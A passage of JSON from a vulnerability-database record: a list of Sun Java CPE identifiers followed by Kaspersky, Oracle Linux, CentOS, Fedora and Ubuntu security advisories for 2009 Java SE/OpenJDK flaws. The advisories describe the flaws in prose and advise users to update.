"cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2020-09-02T11:46:56", "bulletinFamily": "info", "cvelist": ["CVE-2009-3876", "CVE-2009-3875", "CVE-2009-3877"], "description": "### *Detect 
date*:\n11/05/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Sun Java SE. Malicious users can exploit these vulnerabilities to cause denial of service or bypass authentication. Below is a complete list of vulnerabilities.\n\n### *Affected products*:\nSun Java SE 5 updates 21 and earlier \nSun Java SE 6 updates 16 and earlier \nSun Java SE 4 versions 1.4.2 update 23 and earlier \nSun Java SE 3 versions 1.3.1 update 26 and earlier\n\n### *Solution*:\nUpdate to the latest version \n[Java SE](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Sun Java JRE 1.6.x](<https://threats.kaspersky.com/en/product/Sun-Java-JRE-1.6.x/>)\n\n### *CVE-IDS*:\n[CVE-2009-3875](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3875>) 5.0 Critical \n[CVE-2009-3877](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3877>) 5.0 Critical \n[CVE-2009-3876](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3876>) 5.0 Critical", "edition": 42, "modified": "2020-05-22T00:00:00", "published": "2009-11-05T00:00:00", "id": "KLA10344", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10344", "title": "KLA10344 Multiple vulnerabilities in Sun Java SE", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "[1:1.6.0.0.0-1.7.b09.0.1.el5]\n- Add oracle-enterprise.patch\n[1:1.6.0-1.7.b09]\n- Fixed applying patches\n[1:1.6.0-1.6.b09]\n- Updated Release\n[1:1.6.0-1.5.b09]\n- Fixed Makefile patch\n[1:1.6.0-1.4.b09]\n- Updated release tag\n[1:1.6.0-1.3.b09]\n- Updated 
release ", "edition": 4, "modified": "2009-11-16T00:00:00", "published": "2009-11-16T00:00:00", "id": "ELSA-2009-1584", "href": "http://linux.oracle.com/errata/ELSA-2009-1584.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:25:29", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1584\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. 
With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. 
(CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028366.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028367.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1584.html", "edition": 3, "modified": "2009-11-18T10:19:03", "published": "2009-11-18T10:19:02", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/028366.html", "id": "CESA-2009:1584", "title": "java security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. 
", "modified": "2009-11-14T03:30:20", "published": "2009-11-14T03:30:20", "id": "FEDORA:BD01E10F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-30.b16.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:33:25", "published": "2009-11-14T03:33:25", "id": "FEDORA:1C6D410F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-23.b16.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. 
", "modified": "2009-11-14T03:32:17", "published": "2009-11-14T03:32:17", "id": "FEDORA:9A32710F7FF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: java-1.6.0-openjdk-1.6.0.0-33.b16.fc12", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:25:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Dan Kaminsky discovered that SSL certificates signed with MD2 could be \nspoofed given enough time. As a result, an attacker could potentially \ncreate a malicious trusted certificate to impersonate another site. This \nupdate handles this issue by completely disabling MD2 for certificate \nvalidation in OpenJDK. (CVE-2009-2409)\n\nIt was discovered that ICC profiles could be identified with \n\"..\" pathnames. If a user were tricked into running a specially \ncrafted applet, a remote attacker could gain information about a local \nsystem. (CVE-2009-3728)\n\nPeter Vreugdenhil discovered multiple flaws in the processing of graphics \nin the AWT library. If a user were tricked into running a specially \ncrafted applet, a remote attacker could crash the application or run \narbitrary code with user privileges. (CVE-2009-3869, CVE-2009-3871)\n\nMultiple flaws were discovered in JPEG and BMP image handling. If a user \nwere tricked into loading a specially crafted image, a remote attacker \ncould crash the application or run arbitrary code with user privileges. \n(CVE-2009-3873, CVE-2009-3874, CVE-2009-3885)\n\nCoda Hale discovered that HMAC-based signatures were not correctly \nvalidated. Remote attackers could bypass certain forms of authentication, \ngranting unexpected access. 
(CVE-2009-3875)\n\nMultiple flaws were discovered in ASN.1 parsing. A remote attacker \ncould send a specially crafted HTTP stream that would exhaust system \nmemory and lead to a denial of service. (CVE-2009-3876, CVE-2009-3877)\n\nIt was discovered that the graphics configuration subsystem did \nnot correctly handle arrays. If a user were tricked into running \na specially crafted applet, a remote attacker could exploit this \nto crash the application or execute arbitrary code with user \nprivileges. (CVE-2009-3879)\n\nIt was discovered that loggers and Swing did not correctly handle \ncertain sensitive objects. If a user were tricked into running a \nspecially crafted applet, private information could be leaked to a remote \nattacker, leading to a loss of privacy. (CVE-2009-3880, CVE-2009-3882, \nCVE-2009-3883)\n\nIt was discovered that the ClassLoader did not correctly handle certain \noptions. If a user were tricked into running a specially crafted \napplet, a remote attacker could execute arbitrary code with user \nprivileges. (CVE-2009-3881)\n\nIt was discovered that time zone file loading could be used to determine \nthe existence of files on the local system. If a user were tricked into \nrunning a specially crafted applet, private information could be leaked \nto a remote attacker, leading to a loss of privacy. (CVE-2009-3884)", "edition": 5, "modified": "2009-11-12T00:00:00", "published": "2009-11-12T00:00:00", "id": "USN-859-1", "href": "https://ubuntu.com/security/notices/USN-859-1", "title": "OpenJDK vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}